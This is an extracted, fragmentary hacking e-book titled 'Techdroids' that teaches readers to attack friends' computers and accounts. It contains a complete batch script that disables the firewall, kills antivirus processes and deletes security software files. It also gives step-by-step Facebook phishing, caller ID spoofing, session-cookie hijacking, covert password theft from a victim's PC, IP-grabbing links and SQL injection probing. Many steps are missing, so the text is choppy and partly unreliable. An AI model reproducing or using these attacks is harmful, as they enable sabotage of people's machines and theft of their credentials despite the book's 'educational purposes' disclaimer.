Techdroids
Techdroids
Copy rights
Preface
How to Compile C Programs?
Testing the Working of y our Antivirus.
Hidden Codes for Android.
Hacking Windows Experience Index.
Attack Your Friend’s PC with a Small Virus.
Hacking Facebook by Phishing.
How to Fake y our Caller ID?
A Virus to format Hard Disk!
How to Create Folder Replicator Virus using Notepad?
A Virus that Kills y our Antivirus.
Hacking y our Friend's Password.
Hack Passwords by Hijacking HTTP Cookie.
Hack y our Friend's Phone through Bluetooth.
Hacking Websites through SQL Injection.
Tweaks for y our Windows PC.
How to Find the IP Address of Any one?
How to Trace the IP Address?
Hacking Windows Administrator Password.
Hacking Facebook and Websites–
Be Safe
By Techdroids
Few y ears back, I started a Facebook Page called Techdroids, showing some hacks
and tricks. It wasn't a long time, since I started getting numerous requests, say ing
that their beloved ones or friends hacked into their accounts and they wanted a
revenge to be taken by hacking theirs.
But now I took some time to write about this and get y ou a glimpse on how easy it
is to hack, thereby advising every one to increase their SECURITY MEASURES
and to BE SAFE!
In this book y ou will find SEVENTEEN HACKS that will turn y ou to a PRO. All the
hacks y ou will find in this book are for EDUCATIONAL PURPOSES only.
At the time of publishing this book, all the hacks were tested successfully
(Experimented on my self).
Misuse of this book is STRICTLY FORBIDDEN.
Neither Techdroids nor Ageless Reads will be responsible for the misuse.
How to Compile C Programs?
Before moving further, kindly go through this article. Later y ou will find few
articles which are based on this application.
1. Download Borland *++ compiler 5.5 (for Windows) from the given link.
http://goo.gl/cUXYHp
Or
http://goo.gl/0WWjL1
2. After y ou download, run the file C++5.51.exe. The default installation path
would be:
C:\Borland\BCC55
1. After the installation of Borland C++ compiler is complete, create two new Text
Documents.
2. Open the first New Text Document.txt file and copy the following lines:
-I”c:\Borland\Bcc55\include”
-L”c:\Borland\Bcc55\lib”
Save changes and close the file.
Now rename the file from New Text Document.txt to bcc32.cfg
3. Open the second New Text Document (2).txt file and copy the following line:
-L”c:\Borland\Bcc55\lib”
Save changes and close the file.
Rename the file from New Text Document (2).txt to ilink32.cfg
4. If there are no errors in the source code, y ou’ll get a compiled executable
module (example.exe) in the same location (C:\Borland\BCC55\Bin).
Finally, y ou have successfully compiled the source code into an executable file
(.exe file).
Testing the Working of your Antivirus.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-
FILE!$H+H*
Your antivirus is top notch, if it doesn't allow y our PC to copy the above mentioned
code.
2. In the DataStore folder y ou can see a lot of XML files, find the latest file.
3. Just copy that file onto the desktop and open it with notepad and search for
Sy stem Score (CTRL+F), here y ou can check the score of y our PC.
5. Copy back this file to its original directory, to the folder DataStore.
6. On checking sy stem's properties, y ou can find the new value of y our sy stem.
Attack Your Friend’s PC with a Small Virus.
1. Open Notepad.
4. Double clicking the file will delete all the files from y our friend's PC's sy stem32
folder, later y our friend's PC cannot be started again.
Hacking Facebook by Phishing.
1. Download the ACTION.PHP and HTML file from any one of the given link
http://goo.gl/cUXYHp
Or
http://goo.gl/0WWjL1
6. Now first upload y our Edited HTML Page (INDEX.HTML) and next the PHP
File.
7. Give y our by tehost.com website to y our friends and they will login thinking its
their Facebook Login Page, but we know this is a fake one.
8. When they click on login, they will be redirected to a Facebook page of ours.
Go to HT Docs and edit ACTIONS.PHP file, replace the given site with any site of
y our choice, this will be the site where the victim will be redirected.
10. When y our victim logins, ty pe y our by tehost.com site along with victims.html
and press ENTER.
Eg: HTTP://YOURSITE.BYETHOST.COM/VICTIMS.HTML
11. Here comes the magic..
How to Fake your Caller ID?
https://play.google.com/store/apps/details?id=com.telcentris.voxox
or
https://itunes.apple.com/us/app/voxox-call-for-call-connect/id387656058
1. In the call connect option, ty pe y our victim's number, the number y ou want to
call.
2. In the dialer, ty pe the number y ou want to fake, this is the number which
appears on y our victim's phone.
01001011000111110010010101010101010000011111100000
Open notepad, copy the code given below and save the file with extension .bat
@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy *
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A sy man*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky \*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy \*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --
Here we will be using a software called GMAIL HACKER PRO, just run this
software on y our PC and make sure y our antivirus is disabled.
Since this a hacking software, an antivirus will show the message as ‘VIRUS
DETECTED’, but nothing to worry about.
3. Next, plug the Pen Drive to y our friend's PC and run the software directly off
y our Pen Drive in y our friend's absence.
5. Using y our friend's browser cookies and cache data, the software collects all the
email ids and passwords that were used to log into his or her PC and display s them
on the screen.
Hack Passwords by Hijacking HTTP Cookie.
1. Download Firesheep Firefox add-on from any one of the links given below.
http://codebutler.github.com/firesheep/
Or
http://goo.gl/cUXYHp
Or
http://goo.gl/0WWjL1
3. Now, in the sidebar, hit on "Start Capturing" and Firesheep searches for and
captures cookies in a wireless network.
4. As soon as any one on the wireless network visits any insecure website known to
Firesheep, their name and photo will be display ed in the sidebar.
Just double click on someone and y ou're into his or her account.
Hack your Friend's Phone through Bluetooth.
Download any of the above software, copy them to y our device memory, install
them (Compatible with Phones running Java).
Since this a hacking software, an antivirus will show the message as ‘VIRUS
DETECTED’, but nothing to worry about (Use 7-Zip to unzip these files).
Finding Sites Vulnerable to SQ L injection.
2. Open any page and add an apostrophe (‘) at the end of the url.
3. If y ou get a SQL sy ntax error, then this website can be vulnerable to SQL
injection.
Now y ou can try using Havij on this URL.
Tweaks for your Windows PC.
Open the Registry Editor (Start -> Run -> Ty pe regedit and hit Enter).
Right-click on “NameSpace” and select New -> Key. Name the key with the
following name:
{645FF040-5081-101B-9F08-00AA002F954E}
2. Enter y our email id where y ou want to receive the victim's IP Address and hit
on "Get Link".
4. Send this link to y our victim through email or post the link in any forums or
websites and whenever any one clicks on this link, their IP Address will be recorded
and mailed to y ou.
How to Trace the IP Address?
After y ou found the IP address by following the method mentioned in the previous
article, now y ou can find the IP address information by following the below
mentioned method:
With just a click of a button y ou can find the following information of the IP
address.
2. When y ou download the CD version, y ou’ll get a bootable image which needs to
be burnt onto a CD.
3. Use software like POWER ISO or NERO to burn the image onto y our CD.
3. Next boot y our computer from this CD and follow the on screen instructions to
reset the password.